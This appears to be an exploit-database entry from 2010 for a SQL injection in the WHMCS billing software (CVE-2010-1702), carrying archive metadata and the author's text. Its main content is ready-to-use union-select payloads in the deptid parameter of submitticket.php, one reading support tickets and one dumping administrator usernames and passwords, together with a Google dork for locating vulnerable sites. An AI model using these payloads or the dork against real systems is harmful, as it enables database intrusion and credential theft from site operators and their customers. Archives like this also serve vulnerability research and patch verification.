WHMCompleteSolution (WHMCS) control (WHMCompleteSolution) - SQL Injection
Author: Islam DefenDers
type: webapps
platform: php
port:
date_added: 2010-04-23
date_updated: 2017-01-24
verified: 0
codes: OSVDB-64345;CVE-2010-1702
tags:
aliases:
screenshot_url:
application_url:
#=Info=======================================================================#
# Software: WHMCS control (WHMCompleteSolution) Sql Injection #
# #
# Vulnerability: Remote Sql Injection #
# Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS #
# Off. site: www.MiXaTy.com #
#============================================================================#
#=Author==============================================#
# Author: Islam DefenDers #
# Date: 24.04.2010 #
# Contact: email: hackereg@hotmail.com #
#====================================================#
#=Sql Injection===========================================================================================================================================================#
# Exploit: http://site/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,message,6,7,8,9,10 from tbltickets--%20
# DOWNLOAD : http://www.whmcs.com/
# Live demo: http://ste/support/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,username,6,7,8,password,10 from tbladmins--%20
#=========================================================================================================================================================================#
#=Greetz==================================#
# IsLam DefenDers Mr.HaMaDa #
#=======================================#
HaMaDa SCoOoRPioN - DR.B@HY - MiXaTy TeaM - Islam DefenDers TeaM
site: www.mixaty.com
E: hackereg@hotmail.com